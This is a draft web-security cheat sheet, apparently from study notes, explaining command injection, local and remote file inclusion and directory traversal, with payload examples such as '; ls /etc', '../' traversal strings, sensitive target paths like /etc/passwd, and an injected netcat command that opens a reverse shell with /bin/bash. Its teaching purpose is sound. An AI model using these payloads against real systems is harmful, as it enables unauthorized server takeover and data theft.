Show Menu

Command Inj, LFI/RFI, and Directory Traversal Cheat Sheet (DRAFT) by

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Definition and Purpose

Enables inputting of OS commands through the web app
Types of commands geared to Local Results and Remote Results
Commands can be picked based on OS determined during mapping
Command injection provides control of server running with privileges of web apps.

Discov­ering Command Injection

Focus on resources that appear to be used on the system:
- New accounts require directory
- App accepting username parameter
- Runs mkdir username
Useful charac­ter­istics: & , && , || , < , > , ; , |

Command Injection Results

Visible Results
Results returned to the browser. Directory listing ; ls /etc
Blind Results
Nothing displayed in browser. Ping yourself, run a sniffer and look for ICMP echo requests.
The id command is handy because it shows privileges (uid, gid, and group memebe­rship) of current user it is a small command that is widely available and usually in a default path /usr/b­in/id.

Open a Reverse Shell with Command Injection

In Terminal run: nc -lvvnp 1337
Injectable location: [valid entry]; nc [web server] 1337 -e /bin/bash
Book 3 pages 55-56 for other methods

Local and Remote File Inclusion

Local File Inclusion
Read files from the server (Infor­mation Disclo­sure)
Remote File Inclusion
Retrieve files from a remote server. Potential for code execution since the contents of a file is used by app.
File inclusion flaws can retrieve LFI or RFI from the perspe­ctive of the app.

Directory Traversal

Vulner­ability that enables an attacker to leave web root.
Can then run and, load files from "­pro­tec­ted­" areas through file inclusion.
Sometimes it only requires enough "../../../../../­" to escape, others require encoding such as Unicode.
Note: IIS was vulnerable several times and the solution included tracking "­/", but this was defeated by encoding in Unicode because decoding occurred after directory constr­aints enforced.

Command Injection: Tradit­ional Example

Leaves web root allowing access to files on system including program execution.

This runs cmd.exe and retrieves directory listing, must start in scripts directory due to default restri­ction that executable code must run from there.

May use encoding to bypass controls.
Note: Patches are available for all servers known to be vulner­able.

Command Inj: Applic­ation Example

Many apps load files such as templates, configs and data.
Focus on parameters used to load files http:/­/ur­l/i­nde­x.p­hp?­tem­pl=../­inc­lud­e/c­onf­
App fails to verify format and function, nor does it filters enabling an attacker to append commands after the = sign.
Not always immedi­ately identi­fiable, ma be hidden field.
Any code accessing files in the server file system may be vulner­able.

Testing for Directory Traversal and File Inclusion

Most important thing is where in the "­current working direct­ory­" you are when executing script­s/apps.
If found, enter paths based on OS detection during mapping.
/etc/p­asswd = usernames in UNIX
/globa­l.asax = App config on IIS
\docum­e-1­\us­er­\myd­ocu~1 = User directory on Windows 8.3
\windo­ws­\sys­tem­32­\cmd.exe = execute commands on Windows
Note: /var/www or /var/w­ww/html are often web root on Debian­-Linux systems with Apache.
/home/­use­rna­me/­pub­lic­_html/ is the location of users with their own web root
/usr/l­ib/­cgi-bin is a common directory for CGI scripts